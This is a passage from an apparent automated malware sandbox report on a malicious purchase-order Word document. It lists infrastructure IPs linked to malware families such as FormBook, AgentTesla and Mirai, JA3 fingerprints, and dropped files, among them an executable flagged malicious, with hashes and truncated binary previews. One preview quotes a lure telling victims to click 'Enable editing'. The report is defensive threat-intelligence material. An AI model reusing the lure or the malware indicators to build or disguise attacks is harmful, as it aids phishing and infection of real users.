                                                                                    vylI38MZOn.elfGet hashmaliciousMiraiBrowse
                                                                                    • 38.144.30.229
                                                                                    mcEX8uqMA9.elfGet hashmaliciousMiraiBrowse
                                                                                    • 154.42.69.230
                                                                                    L31owFeEHg.elfGet hashmaliciousMiraiBrowse
                                                                                    • 38.192.195.72
                                                                                    nAgY4qjFwu.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    jDrEk4Z8cP.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    S8XVPpU2wq.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    DQUOFZJDd5.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.44.30.231
                                                                                    OVHFRhttps://herozheng.com/Get hashmaliciousUnknownBrowse
                                                                                    • 147.135.94.220
                                                                                    H0RZizYUEv.elfGet hashmaliciousMiraiBrowse
                                                                                    • 142.44.233.39
                                                                                    hPEMPaXhhr.exeGet hashmaliciousRedLineBrowse
                                                                                    • 54.39.249.56
                                                                                    lNUsUO1sge.elfGet hashmaliciousMiraiBrowse
                                                                                    • 192.99.71.250
                                                                                    Specification 1223.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                    • 139.99.5.44
                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 54.38.220.85
                                                                                    RFQ.xlsm.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                    • 178.33.249.251
                                                                                    ORDER-290424-007994PT.vbsGet hashmaliciousWSHRat, AgentTeslaBrowse
                                                                                    • 51.254.27.105
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 37.59.96.160
                                                                                    Orders-2604_24.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                    • 139.99.5.44
                                                                                    LINODE-APLinodeLLCUSEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                    • 45.33.6.223
                                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                    • 45.33.97.245
                                                                                    SecuriteInfo.com.Program.Unwanted.4826.21447.30958.exeGet hashmaliciousUnknownBrowse
                                                                                    • 45.33.97.245
                                                                                    https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                    • 45.56.122.121
                                                                                    https://www.canva.com/design/DAGEAa4PcvI/o5lifZGBI-4kJErApUzUSw/view?utm_content=DAGEAa4PcvI&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                                                                                    • 45.56.122.121
                                                                                    https://cushwake.radiacellar.com/Get hashmaliciousHTMLPhisherBrowse
                                                                                    • 104.237.130.23
                                                                                    confirmation de cuenta.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 139.162.5.234
                                                                                    SalinaGroup.docGet hashmaliciousFormBookBrowse
                                                                                    • 45.33.6.223
                                                                                    FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 139.162.5.234
                                                                                    FV- 12.429#U00a0TUSOCAL.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                    • 139.162.5.234

                                                                                    JA3 Fingerprints

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    7dcce5b76c8b17472d024758970a406bEMPLOYEE-FINAL-SETTLEMENTS.docGet hashmaliciousFormBookBrowse
                                                                                    • 104.21.74.191
                                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
                                                                                    Account report (1).docxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
                                                                                    documento.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                    • 104.21.74.191
                                                                                    nU7Z8sPyvf.rtfGet hashmaliciousRemcosBrowse
                                                                                    • 104.21.74.191
                                                                                    QF3YL9rOxB.rtfGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.21.74.191
                                                                                    GENERALCANDY INV FWDRB42024.docGet hashmaliciousLokibotBrowse
                                                                                    • 104.21.74.191
                                                                                    citat-05012024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191
                                                                                    cotizaci#U00f3n_04302024.xla.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                    • 104.21.74.191
                                                                                    RFQ-37463746374634.xlsGet hashmaliciousUnknownBrowse
                                                                                    • 104.21.74.191

                                                                                    Dropped Files

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    C:\Users\user\AppData\Local\Temp\sqlite3.dllmaildatas.xlsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                      5890796959.xlsGet hashmaliciousFormBookBrowse
                                                                                        DlXCfRPdLr.rtfGet hashmaliciousFormBookBrowse
                                                                                          NEW_ORDER.xlsGet hashmaliciousFormBookBrowse

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\opp[1].scr

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):636928
                                                                                            Entropy (8bit):7.634194042962642
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:6ZZcyAHUylUe/tDISmWNf1hAY7PFVSz2NYKcV4v9yf+29EfaGT/T95BGjNBukNFy:CKlUKV7l7PFAz2NNHwu1T/T98BuZ
                                                                                            MD5:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            SHA1:AC0EC507CC8D749FD5FC5E59257856BCD5492E42
                                                                                            SHA-256:57243762AAFFC5CAB1DC4A9E630DB4D4E5D9F746141650CB7E4F78629F7C065D
                                                                                            SHA-512:02BBCDBAD66A138D9C749F4F95FF5BEEBEB2C74D8D244277CAC2795870005866C1D4BF9CCD03B370021F7218D6A0280D8FF8786D3FB0B64A7CFC4D1A3A0E085B
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                            Reputation:low
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../.................0.................. ........@.. ....................... ............@.....................................O.......^............................................................................ ............... ..H............text........ ...................... ..`.rsrc...^...........................@..@.reloc..............................@..B........................H..........................T#.............................................o................................................&.(9.....*".......*J.~....te...(>...&*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(9....*.(.........(?...~....(....o@...oA....#......*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*"..{H...*R..{H.....{H...(F

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlite-dll-win32-x86-3290000[1].zip

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):486020
                                                                                            Entropy (8bit):7.998960424234155
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:EKlJSZA7zQtl7IZyBgByo77WNMzTSZJVahsC:roZKzQtl7IZyqBy278pJVahsC
                                                                                            MD5:AF10A982A2EF91C9787106EEA1A0CC4A
                                                                                            SHA1:00435A36F5E6059287CDE2CEBB2882669CDBA3A5
                                                                                            SHA-256:E028068B067E5E60FA5680B0BAFA48A31287B6D614EE0B92DF51CCE23B974099
                                                                                            SHA-512:73D0D3034405527798B854DC33FC608C7CCF0AF1689E139AF4BBB5A5324DC0748BDC2BF632468745920DC7BE4EB7F0240D3CF1B5872D3F5C0C897725DB78BF9F
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:PK........-..NO..:4...........sqlite3.defUT....)&].)&]ux.................(...y.d....r.Tv.{sa,.....3==O....t.4.'.BHB.......?.....2.ms.....&.G.J.!<.;.`...g!..1..(.i)..Cl.W......fk.>.Q.2.4k;.......g..).o..<.....N...56i.8..gB.......q...A....U.].........S.......s$....=.p.@,-.:....o.E.ES.$...6V.Ha$.g.'q..h-5.....D1=G.M..*.Z...N.`......n.+..3$..|.P..".Y...iF.~.......V.`...BU.....G*.5.Nmj<...yx\=6E..f.@"l...Z<...w....o..J..g.. <.D..i?4.....j.....%^.../...O.t.F.......rw.v......{.O:....k.....PA{H!/..H..D....x..}z[".c .{9.5...&....v....b...n....G...H...X...H...-...9i.6...... .fV..I.....@@.r.S.z.n....:LIX..L.].YM..Z}.5V.|pF..a4...].?.30.L.,4.'.;y\R-.....u.;...j........y..>..\....jP.fT.]xEXs.3QV+z.'..mu.]hme3$....I.O.-...r...).......:..9x.F...8'c.."......a&.@..j.Vb..q.4...z.c.CV.&G.F.....K8h.d.........w.+..... .......nPT...(c..O..n@..<zVq..gu.al.L..P.<...e!&1..3..kg.....m*.Ug.@am.^..3.#.fU.a.!O:.W.....i...uK.]..p........)Go.v........0.._.`..I....<...._b..

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{32287031-1AA7-4113-9CE7-2D38FFF56A48}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):16384
                                                                                            Entropy (8bit):0.0
                                                                                            Encrypted:false
                                                                                            SSDEEP:3::
                                                                                            MD5:CE338FE6899778AACFC28414F2D9498B
                                                                                            SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                                                            SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                                                            SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                                                            Malicious:false
                                                                                            Reputation:high, very likely benign file
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{3A3C11FA-90ED-43D5-ADC7-410054725309}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):92672
                                                                                            Entropy (8bit):3.502882394803038
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:IgI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gI2Q5Q6IQXwvW5Kq2g05gIN:LSyemuSyemuSyemuSyemuSyemF0CxR
                                                                                            MD5:68325691EAED8CBC078A8CFB9CE23933
                                                                                            SHA1:A8AB491DE1D2BAECAF8B838ACDBFDFEE75A2856B
                                                                                            SHA-256:7ADDC8AF01F9F395CADCDD5D21A6132696E8505FA243054383882A1B03B6E33B
                                                                                            SHA-512:54F2FA1CD20188D5482403FE2D8705CA4CCDE0C0507CDAEDEF5861095F4D2C3DEEF0001F25B7F8CA4A0CFF54189A3AB70AAF9227497B6DDBB800735C18C3CF42
                                                                                            Malicious:false
                                                                                            Preview:7.6.4.1.2.1.7.2.p.l.e.a.s.e. .c.l.i.c.k. .E.n.a.b.l.e. .e.d.i.t.i.n.g. .f.r.o.m. .t.h.e. .y.e.l.l.o.w. .b.a.r. .a.b.o.v.e...T.h.e. .i.n.d.e.p.e.n.d.e.n.t. .a.u.d.i.t.o.r.s.. .o.p.i.n.i.o.n. .s.a.y.s. .t.h.e. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s. .a.r.e. .f.a.i.r.l.y. .s.t.a.t.e.d. .i.n. .a.c.c.o.r.d.a.n.c.e. .w.i.t.h. .t.h.e. .b.a.s.i.s. .o.f. .a.c.c.o.u.n.t.i.n.g. .u.s.e.d. .b.y. .y.o.u.r. .o.r.g.a.n.i.z.a.t.i.o.n... .S.o. .w.h.y. .a.r.e. .t.h.e. .a.u.d.i.t.o.r.s. .g.i.v.i.n.g. .y.o.u. .t.h.a.t. .o.t.h.e.r. .l.e.t.t.e.r. .I.n. .a.n. .a.u.d.i.t. .o.f. .f.i.n.a.n.c.i.a.l. .s.t.a.t.e.m.e.n.t.s.,. .p.r.o.f.e.s.s.i.o.n.a.l. .s.t.a.n.d.a.r.d.s. .r.e.q.u.i.r.e. .t.h.a.t. .a.u.d.i.t.o.r.s. .o.b.t.a.i.n. .a.n. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .t.h.e. .e.x.t.e.n.t. .n.e.c.e.s.s.a.r.y. .t.o. .p.l.a.n. .t.h.e. .a.u.d.i.t... .A.u.d.i.t.o.r.s. .u.s.e. .t.h.i.s. .u.n.d.e.r.s.t.a.n.d.i.n.g. .o.f. .i.n.t.e.r.n.a.l. .c.o.n.t.r.o.l.s. .t.o. .a.s.s.e.s.s. .

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7BC00D90-3286-43A4-8263-7BB80B0A8239}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1024
                                                                                            Entropy (8bit):0.05390218305374581
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:ol3lYdn:4Wn
                                                                                            MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                            Malicious:false
                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{E434B38F-ED25-466F-B480-94EE051CC92F}.tmp

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1536
                                                                                            Entropy (8bit):1.3554734412254816
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbS:IiiiiiiiiifdLloZQc8++lsJe1MzBn
                                                                                            MD5:C04D4D6345AFB202AE886B36484B72B6
                                                                                            SHA1:FD70A245F46FE0E25ABDA3F9F564A78AC744FCFA
                                                                                            SHA-256:ED9114CE8D044E332D0EE7E571E58DDDA4D41CFDD6CA19A0BDBDD00450E124E6
                                                                                            SHA-512:2BB8383B6AB916AC4AE399926421607CB7814FFADB6504FAA101191A7E95C2EC580916DD8287E90C0FAC8FC7ABC45B53C2D76D5B2BEAF43A179032D69BE9A7A0
                                                                                            Malicious:false
                                                                                            Preview:..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\13d6pS3

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                                                            Category:dropped
                                                                                            Size (bytes):77824
                                                                                            Entropy (8bit):1.133993246026424
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                                                            MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                                                            SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                                                            SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                                                            SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                                                            Malicious:false
                                                                                            Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.def

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:ASCII text
                                                                                            Category:dropped
                                                                                            Size (bytes):5583
                                                                                            Entropy (8bit):4.352170265556474
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:GcuN/gR+7Ogn0XRMcGM3KOGOF++hwIMtvQENw+Y0aR:E/Q+7Ogn0RKOBF++eHvQENw+cR
                                                                                            MD5:4F576602CE4286C96EBFE17A47332626
                                                                                            SHA1:289E71E45B3A4B10CB6E4B9A844EDEECDC09923A
                                                                                            SHA-256:A043CB55CFDBA9F4426C2006502BF2805B19CC9B0C81B09EAA76BDC9BD5F04CC
                                                                                            SHA-512:30B5771042F910EC53EBCB2396BE26DAFB0F2AB1D2FE886C2C1FCE2172D1F45ABB9EB417C24D0B87168690CD0E727F83D3CEC711787A44E095873D9975CF90C2
                                                                                            Malicious:false
                                                                                            Preview:EXPORTS.sqlite3_aggregate_context.sqlite3_aggregate_count.sqlite3_auto_extension.sqlite3_backup_finish.sqlite3_backup_init.sqlite3_backup_pagecount.sqlite3_backup_remaining.sqlite3_backup_step.sqlite3_bind_blob.sqlite3_bind_blob64.sqlite3_bind_double.sqlite3_bind_int.sqlite3_bind_int64.sqlite3_bind_null.sqlite3_bind_parameter_count.sqlite3_bind_parameter_index.sqlite3_bind_parameter_name.sqlite3_bind_pointer.sqlite3_bind_text.sqlite3_bind_text16.sqlite3_bind_text64.sqlite3_bind_value.sqlite3_bind_zeroblob.sqlite3_bind_zeroblob64.sqlite3_blob_bytes.sqlite3_blob_close.sqlite3_blob_open.sqlite3_blob_read.sqlite3_blob_reopen.sqlite3_blob_write.sqlite3_busy_handler.sqlite3_busy_timeout.sqlite3_cancel_auto_extension.sqlite3_changes.sqlite3_clear_bindings.sqlite3_close.sqlite3_close_v2.sqlite3_collation_needed.sqlite3_collation_needed16.sqlite3_column_blob.sqlite3_column_bytes.sqlite3_column_bytes16.sqlite3_column_count.sqlite3_column_database_name.sqlite3_column_database_name16.sqlite3_colum

                                                                                            C:\Users\user\AppData\Local\Temp\sqlite3.dll

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):926331
                                                                                            Entropy (8bit):6.513562485953698
                                                                                            Encrypted:false
                                                                                            SSDEEP:24576:oI0H1fcKoDde/KBkI/njv7UU5vrVGFWG/Pi:obaRdeyBkI/jjUU5vJ8S
                                                                                            MD5:5E5BA61531D74E45B11CADB79E7394A1
                                                                                            SHA1:677224E14AAC9DD35F367D5EB1704B36E69356B8
                                                                                            SHA-256:99E91AE250C955BD403EC1A2321D6B11FCB715BDCC7CB3F63FFB46B349AFDE5C
                                                                                            SHA-512:712BFE419BA97ECF0EC8323A68743013E8C767DA9D986F74AB94D2A395C3086CAC2A5823048E0022D3BBCEBB55281B9E1F8C87FDC9295C70CC5521B57850BF46
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                            Joe Sandbox View:
                                                                                            • Filename: maildatas.xls, Detection: malicious, Browse
                                                                                            • Filename: 5890796959.xls, Detection: malicious, Browse
                                                                                            • Filename: DlXCfRPdLr.rtf, Detection: malicious, Browse
                                                                                            • Filename: NEW_ORDER.xls, Detection: malicious, Browse
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)&].2..(......!.....v...&.....................a................................D......... .......................... ... ..H....P.......................`...3...........................@.......................!...............................text....t.......v..................`.P`.data...|............|..............@.`..rdata...#.......$..................@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H.... ......................@.0..CRT....,....0......................@.0..tls.... ....@......................@.0..rsrc........P......................@.0..reloc...3...`...4..................@.0B/4...................,..............@.@B/19.................0..............@..B/31..........P......................@..B/45..........p......................@..B/57.................................@.0B/70.....i...............

                                                                                            C:\Users\user\AppData\Local\Temp\u62ln.zip

                                                                                            Download File
                                                                                            Process:C:\Windows\SysWOW64\dfrgui.exe
                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                            Category:dropped
                                                                                            Size (bytes):486020
                                                                                            Entropy (8bit):7.998960424234155
                                                                                            Encrypted:true
                                                                                            SSDEEP:12288:EKlJSZA7zQtl7IZyBgByo77WNMzTSZJVahsC:roZKzQtl7IZyqBy278pJVahsC
                                                                                            MD5:AF10A982A2EF91C9787106EEA1A0CC4A
                                                                                            SHA1:00435A36F5E6059287CDE2CEBB2882669CDBA3A5
                                                                                            SHA-256:E028068B067E5E60FA5680B0BAFA48A31287B6D614EE0B92DF51CCE23B974099
                                                                                            SHA-512:73D0D3034405527798B854DC33FC608C7CCF0AF1689E139AF4BBB5A5324DC0748BDC2BF632468745920DC7BE4EB7F0240D3CF1B5872D3F5C0C897725DB78BF9F
                                                                                            Malicious:false
                                                                                            Preview:PK........-..NO..:4...........sqlite3.defUT....)&].)&]ux.................(...y.d....r.Tv.{sa,.....3==O....t.4.'.BHB.......?.....2.ms.....&.G.J.!<.;.`...g!..1..(.i)..Cl.W......fk.>.Q.2.4k;.......g..).o..<.....N...56i.8..gB.......q...A....U.].........S.......s$....=.p.@,-.:....o.E.ES.$...6V.Ha$.g.'q..h-5.....D1=G.M..*.Z...N.`......n.+..3$..|.P..".Y...iF.~.......V.`...BU.....G*.5.Nmj<...yx\=6E..f.@"l...Z<...w....o..J..g.. <.D..i?4.....j.....%^.../...O.t.F.......rw.v......{.O:....k.....PA{H!/..H..D....x..}z[".c .{9.5...&....v....b...n....G...H...X...H...-...9i.6...... .fV..I.....@@.r.S.z.n....:LIX..L.].YM..Z}.5V.|pF..a4...].?.30.L.,4.'.;y\R-.....u.;...j........y..>..\....jP.fT.]xEXs.3QV+z.'..mu.]hme3$....I.O.-...r...).......:..9x.F...8'c.."......a&.@..j.Vb..q.4...z.c.CV.&G.F.....K8h.d.........w.+..... .......nPT...(c..O..n@..<zVq..gu.al.L..P.<...e!&1..3..kg.....m*.Ug.@am.^..3.#.fU.a.!O:.W.....i...uK.]..p........)Go.v........0.._.`..I....<...._b..

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\MOQ010524Purchase order.LNK

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:04 2023, mtime=Fri Aug 11 15:42:04 2023, atime=Thu May 2 05:26:02 2024, length=199141, window=hide
                                                                                            Category:dropped
                                                                                            Size (bytes):1079
                                                                                            Entropy (8bit):4.527097313880883
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:8Nk/XTsdzxOwCdkU7fBJe79/Qf3Dv3qBk7N:8Nk/XTgzqkeW/BiN
                                                                                            MD5:24D363D0E3C97ACC70836A3D1DF669A3
                                                                                            SHA1:6BB7836F30DBAC252A584546BAE5F41E5A6DD4CF
                                                                                            SHA-256:4B4C559F2A84316F6886235FA768DBBF588A68FC3DA06D3014AABD4D670A3B93
                                                                                            SHA-512:3B0AD846BFCEE891F4A551AF5537C6F136674DB85D6FF12E7144870332038F4A87317F88D8B8FE2770A5BD624389993D14228A6B1E9FFA32A5D1BC2F12434167
                                                                                            Malicious:false
                                                                                            Preview:L..................F.... ..._.u.r..._.u.r...{..Y................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X=3..user.8......QK.X.X=3*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......XB3 .MOQ010~1.DOC..d.......WC..WC.*.........................M.O.Q.0.1.0.5.2.4.P.u.r.c.h.a.s.e. .o.r.d.e.r...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\927537\Users.user\Desktop\MOQ010524Purchase order.doc.2.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.M.O.Q.0.1.0.5.2.4.P.u.r.c.h.a.s.e. .o.r.d.e.r...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......92753

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:Generic INItialization configuration [folders]
                                                                                            Category:dropped
                                                                                            Size (bytes):80
                                                                                            Entropy (8bit):4.743419658168687
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:M13sRXRmlKRAXdrFom4f0VRXRmlKRAXdrFov:M+xwlAAXd5lVxwlAAXd5y
                                                                                            MD5:DFAC9B954AE3F65DE31A5137C624F38B
                                                                                            SHA1:3F4187329D38535346694DDCDD4F82F85375C2E5
                                                                                            SHA-256:4FCED1AA79A30F92C6152DED4D79BE8EAF14C43084EF16CB750F0805E0939856
                                                                                            SHA-512:D380B10CFFCC9A880C0A593A8BEF4A67D96929D7A53C9066CEEC02DB29F01896AB9941049916BB78CA5E614B20F816C09F3CF056E023C4243A01D3878FD1A8E3
                                                                                            Malicious:false
                                                                                            Preview:[doc]..MOQ010524Purchase order.LNK=0..[folders]..MOQ010524Purchase order.LNK=0..

                                                                                            C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                            Download File
                                                                                            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):162
                                                                                            Entropy (8bit):2.4797606462020307
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                                                            MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                                                            SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                                                            SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                                                            SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                                                            Malicious:false
                                                                                            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                                                            C:\Users\user\AppData\Roaming\op55336.scr

                                                                                            Download File
                                                                                            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):636928
                                                                                            Entropy (8bit):7.634194042962642
                                                                                            Encrypted:false
                                                                                            SSDEEP:6144:6ZZcyAHUylUe/tDISmWNf1hAY7PFVSz2NYKcV4v9yf+29EfaGT/T95BGjNBukNFy:CKlUKV7l7PFAz2NNHwu1T/T98BuZ
                                                                                            MD5:3CCB984FD28AFEA83F2F2E8A6ED4CCFA
                                                                                            SHA1:AC0EC507CC8D749FD5FC5E59257856BCD5492E42
                                                                                            SHA-256:57243762AAFFC5CAB1DC4A9E630DB4D4E5D9F746141650CB7E4F78629F7C065D
                                                                                            SHA-512:02BBCDBAD66A138D9C749F4F95FF5BEEBEB2C74D8D244277CAC2795870005866C1D4BF9CCD03B370021F7218D6A0280D8FF8786D3FB0B64A7CFC4D1A3A0E085B
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
